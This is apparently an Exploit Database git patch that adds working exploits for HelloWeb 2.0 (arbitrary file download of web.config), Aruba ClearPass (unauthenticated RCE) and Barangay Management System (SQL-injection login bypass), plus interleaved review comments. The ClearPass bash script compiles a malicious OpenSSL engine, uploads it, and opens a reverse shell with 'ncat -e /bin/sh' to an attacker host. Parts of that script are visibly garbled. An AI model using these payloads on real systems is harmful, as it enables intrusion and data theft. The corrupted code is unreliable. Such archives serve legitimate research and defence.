From c0e7247938e883f17e115b55e9afe01fc7953617 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 11 Jul 2020 05:02:09 +0000 Subject: [PATCH] DB: 2020-07-11 5 changes to exploits/shellcodes FrootVPN 4.8 - 'frootvpn' Unquoted Service Path Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution HelloWeb 2.0 - Arbitrary File Download Barangay Management System 1.0 - Authentication Bypass --- exploits/asp/webapps/48659.txt | 72 ++++++++++++++++++++++++++++++++ exploits/linux/remote/48661.sh | 49 ++++++++++++++++++++++ exploits/php/webapps/48660.txt | 42 +++++++++++++++++++ exploits/windows/local/48657.txt | 40 ------------------ files_exploits.csv | 4 +- 5 files changed, 166 insertions(+), 41 deletions(-) create mode 100644 exploits/asp/webapps/48659.txt create mode 100755 exploits/linux/remote/48661.sh create mode 100644 exploits/php/webapps/48660.txt delete mode 100644 exploits/windows/local/48657.txt diff --git a/exploits/asp/webapps/48659.txt b/exploits/asp/webapps/48659.txt new file mode 100644 index 000000000..abf6d05ec --- /dev/null +++ b/exploits/asp/webapps/48659.txt 
@@ -0,0 +1,72 @@
+# Exploit Title: HelloWeb 2.0 - Arbitrary File Download
+# Date: 2020-07-09
+# Vendor Homepage: https://helloweb.co.kr/
+# Version: 2.0 [Latest] and previous versions
+# Exploit Author: bRpsd
+# Contact Author: cy[at]live.no
+# Google Dork: inurl:exec/file/download.asp
+# Type: WebApps / ASP
+-----------------------------------------------------
+
+
+
+Vulnerable code:
+######################################################################################################
+Dim filepath, filename, root_path, fso, root_folder, attachfile, objStream, strFile
+
+filepath = Request.QueryString("filepath")
+filename = Request.QueryString("filename")
+filepath = Replace(filepath,"/","\")
+
+root_path = server.MapPath("/")
+Set fso = CreateObject("Scripting.FileSystemObject")
+Set root_folder = fso.GetFolder(root_path)
+
+attachfile = root_path & filepath & "\" & filename
+
+Response.Clear
+Response.ContentType = "application/unknown"
+Response.AddHeader "Pragma", "no-cache"
+Response.AddHeader "Expires", "0"
+Response.AddHeader "Content-Transfer-Encoding", "binary"
+Response.AddHeader "Content-Disposition","attachment; filename = " & Server.URLPathEncode(filename)
+
+Set objStream = Server.CreateObject("ADODB.Stream")
+objStream.Open
+
+objStream.Type = 1
+objStream.LoadFromFile attachfile
+
+Response.BinaryWrite objStream.Read
+Response.Flush
+######################################################################################################
+
+Vulnerability: Arbitrary File Download
+Location: http://localhost/exec/file/download.asp
+Parameters: filename & filepath
+
+Proof of concept:
+
+GET /exec/file/download.asp?filepath=/&filename=web.config HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+
+RESPONSE: +HTTP/1.1 200 OK +Cache-Control: private +Pragma: no-cache +Content-Type: application/unknown; Charset=utf-8 +Expires: 0,Thu, 09 Jul 2020 10:51:14 GMT +Server: +Content-Transfer-Encoding: binary +Content-Disposition: attachment; filename = web.config +Set-Cookie: ASPSESSIONIDQQCBDRBB=BEMDPMDDKFHNFKFMJGHIKKKI; path=/ +Access-Control-Allow-Origin: * +x-xss-protection: 1; mode=block +Date: Thu, 09 Jul 2020 10:51:14 GMT +Connection: close \ No newline at end of file diff --git a/exploits/linux/remote/48661.sh b/exploits/linux/remote/48661.sh new file mode 100755 index 000000000..92c04f29f --- /dev/null +++ b/exploits/linux/remote/48661.sh @@ -0,0 +1,49 @@ +# Exploit Title: Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution +# Date: 2020-07-06 +# Exploit Author: SpicyItalian +# Vendor Homepage: https://www.arubanetworks.com/products/security/network-access-control/ +# Version: ClearPass 6.7.x prior to 6.7.13-HF, ClearPass 6.8.x prior to 6.8.5-HF, ClearPass 6.9.x prior to 6.9.1 +# Tested on: ClearPass 6.7.0 +# CVE: CVE-2020-7115 + +Use of RHEL/CentOS 7.x is recommended to successfully generate the malicious OpenSSL engine. + +#!/usr/bin/env bash + +if [ "$#" -ne 4 ]; then +echo "Usage: `basename $0` [remote host] [remote port] [local host] [local port]" +exit 0 +fi +cat <>payload.c +#include +__attribute__((constructor)) +static void init() { +execl("/bin/sh", "sh", "-c", "rm -f /tmp/clientCertFile*.txt ; sleep 1 ; ncat $3 $4 -e /bin/sh", NULL); +} +EOF + +gcc -fPIC -c payload.c +gcc -shared -o payload.so -lcrypto payload.o +rm -f payload.c payload.o +curl -X POST -F 'clientPassphrase=req -engine /tmp/clientCertFile*.txt' -F 'uploadClientCertFile=@./payload.so' -k https://$1:$2/tips/tipsSimulationUpload.action &>/dev/null & +cat <<"EOF" + +/(\ + +¡ !´\ + +| )\ `. + +| `.) \,-,-- + +( / / + +`'-.,;_/ + +`---- + +EOF + +printf "\nPleasea waita for your spicy shell...\n\n" + +ncat -v -l $3 $4 \ No newline at end of file 
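Review bot: The root cause in the quoted handler is the line `attachfile = root_path & filepath & "\" & filename`, which builds a filesystem path from two unvalidated query parameters with no canonicalization and no check that the result stays inside the intended download directory, yet the write-up states neither this nor a mitigation; a sentence recommending that the handler resolve the final path and reject anything outside that directory (or serve files by an opaque id looked up server-side) would make the entry far more useful to defenders. The preceding `filepath = Replace(filepath,"/","\")` only normalises separators and is not a security control, which is worth saying explicitly since it can read as one. The header also omits the `# CVE:` and `# Tested on:` fields that the other two entries added in this commit carry; `# CVE: N/A` is the convention used in 48660.txt when none was assigned.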
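Review bot: The file is not well-formed as committed: the uncommented prose line `Use of RHEL/CentOS 7.x is recommended to successfully generate the malicious OpenSSL engine.` sits between the comment header and `#!/usr/bin/env bash`, so the shebang is not on line 1 (and is therefore ignored by the loader despite mode 100755) and the prose would be parsed as a command; it should be a `# ` comment like the header lines above it. The heredoc opener `cat <>payload.c` and the bare `#include` directive also appear to have lost text in transit (an HTML-escaping artifact is the most likely explanation), so the entry should be checked against the original submission before it is published in this form. Since the `# Version:` line already names the fixed hotfix releases, a pointer to the vendor advisory for the listed CVE would help defenders triage this entry.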
diff --git a/exploits/php/webapps/48660.txt b/exploits/php/webapps/48660.txt
new file mode 100644
index 000000000..5ebe21ff3
--- /dev/null
+++ b/exploits/php/webapps/48660.txt
@@ -0,0 +1,42 @@
+# Exploit Title: Barangay Management System 1.0 - Authentication Bypass
+# Google Dork: N/A
+# Date: 2020-07-05
+# Exploit Author: BKpatron
+# Vendor Homepage: https://www.sourcecodester.com/php/13484/barangay-management-system.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/antiokz/barangay_1.zip
+# Version: v1.0
+# Tested on: Win 10
+# CVE: N/A
+# my website: bkpatron.com
+
+# Vulnerability: Attacker can bypass login page and access to dashboard page
+# vulnerable file : index.php
+# Parameter & Payload: '=''or'
+# Proof of Concept:
+http://localhost/Barangay/adminlogin.php
+
+POST /Barangay/adminlogin.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 74
+Referer: http://localhost/Barangay/
+Cookie: PHPSESSID=jt0a3e89ukmktgtuoedjqmktge
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+admin_name=%27%3D%27%27or%27&admin_pass=%27%3D%27%27or%27&adminlogin=Login: undefined
+
+HTTP/1.1 200 OK
+Date: Sat, 04 Jul 2020 20:35:25 GMT
+Server: Apache/2.4.39 (Win64) PHP/7.2.18
+X-Powered-By: PHP/7.2.18
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Content-Length: 3638
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
\ No newline at end of file
diff --git a/exploits/windows/local/48657.txt b/exploits/windows/local/48657.txt
deleted file mode 100644
index 00a41a3e9..000000000
--- a/exploits/windows/local/48657.txt
+++ /dev/null
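Review bot: The write-up never names the root cause, which the `'=''or'` value submitted in `admin_name` and `admin_pass` strongly suggests is SQL injection in the login query, so the entry should state that and give the mitigation for defenders: a parameterised (prepared-statement) credential lookup and comparison against a stored password hash rather than a raw value. The metadata is also inconsistent with the PoC, `# vulnerable file : index.php` versus a request to `/Barangay/adminlogin.php`; one of the two needs correcting. In the captured request, the declared `Content-Length: 74` matches the body exactly up to `adminlogin=Login`, so the trailing `: undefined` is a capture artifact rather than part of the submitted form and should be removed from the listing.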
@@ -1,40 +0,0 @@ -# Exploit : FrootVPN 4.8 - 'frootvpn' Unquoted Service Path -# Date : 2020-07-09 -# Author : v3n0m -# Vendor : https://frootvpn.com/ -# App Link : https://frootvpn.com/en/download-client?platform=win -# Version : 4.8 -# Tested on : Windows 10 Pro build 19041.329 -# Credits : YOGYACARDERLINK, bejo6, Ika Atikasari - -# PoC: - -Microsoft Windows [Version 10.0.19041.329] -(c) 2020 Microsoft Corporation. All rights reserved. - -C:\Users\HP>wmic service get name,pathname,startmode,StartName | findstr "FrootVPN" -FrootVPN "C:\Program Files\FrootVPN\vpn.service.exe" Manual LocalSystem - -C:\Users\HP>sc qc frootvpn -[SC] QueryServiceConfig SUCCESS - -SERVICE_NAME: frootvpn - TYPE : 10 WIN32_OWN_PROCESS - START_TYPE : 3 DEMAND_START - ERROR_CONTROL : 1 NORMAL - BINARY_PATH_NAME : "C:\Program Files\FrootVPN\vpn.service.exe" - LOAD_ORDER_GROUP : - TAG : 0 - DISPLAY_NAME : FrootVPN - DEPENDENCIES : - SERVICE_START_NAME : LocalSystem - -C:\Users\HP> - - -# Security Risk - -A successful attempt would require the local user to be able to insert their code -in the system root path undetected by the OS or other security applications -where it could potentially be executed during application startup or reboot. -If successful, the local user's code would execute with the elevated privileges of the application. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index c7033d76d..103e96a81 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
@@ -11120,7 +11120,6 @@ id,file,description,date,author,type,platform,port
 48625,exploits/windows/local/48625.txt,"KiteService 1.2020.618.0 - Unquoted Service Path",2020-06-26,"Marcos Antonio León",local,windows,
 48628,exploits/windows/local/48628.py,"RM Downloader 2.50.60 2006.06.23 - 'Load' Local Buffer Overflow (EggHunter) (SEH) (PoC)",2020-07-01,"Paras Bhatia",local,windows,
 48644,exploits/hardware/local/48644.c,"Sony Playstation 4 (PS4) < 7.02 / FreeBSD 9 / FreeBSD 12 - 'ip6_setpktopt' Kernel Local Privilege Escalation (PoC)",2020-03-21,TheFloW,local,hardware,
-48657,exploits/windows/local/48657.txt,"FrootVPN 4.8 - 'frootvpn' Unquoted Service Path",2020-07-09,v3n0m,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -18210,6 +18209,7 @@ id,file,description,date,author,type,platform,port
 48587,exploits/multiple/remote/48587.py,"SOS JobScheduler 1.13.3 - Stored Password Decryption",2020-06-15,"Sander Ubink",remote,multiple,
 48620,exploits/hardware/remote/48620.txt,"mySCADA myPRO 7 - Hardcoded Credentials",2020-06-25,"Emre ÖVÜNÇ",remote,hardware,
 48650,exploits/xml/remote/48650.txt,"Microsoft Windows mshta.exe 2019 - XML External Entity Injection",2020-07-07,hyp3rlinx,remote,xml,
+48661,exploits/linux/remote/48661.sh,"Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution",2020-07-10,SpicyItalian,remote,linux,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -42908,4 +42908,6 @@ id,file,description,date,author,type,platform,port
 48653,exploits/hardware/webapps/48653.txt,"BSA Radar 1.6.7234.24750 - Cross-Site Request Forgery (Change Password)",2020-07-08,"William Summerhill",webapps,hardware,
 48655,exploits/php/webapps/48655.php,"PHP 7.4 FFI - 'disable_functions' Bypass",2020-07-07,"hunter gregal",webapps,php,
 48656,exploits/php/webapps/48656.txt,"Wordpress Plugin Powie's WHOIS Domain Check 0.9.31 - Persistent Cross-Site Scripting",2020-07-09,mqt,webapps,php,
+48659,exploits/asp/webapps/48659.txt,"HelloWeb 2.0 - Arbitrary File Download",2020-07-10,bRpsd,webapps,asp,
 48658,exploits/php/webapps/48658.txt,"Savsoft Quiz 5 - Persistent Cross-Site Scripting",2020-07-09,th3d1gger,webapps,php,
+48660,exploits/php/webapps/48660.txt,"Barangay Management System 1.0 - Authentication Bypass",2020-07-10,BKpatron,webapps,php,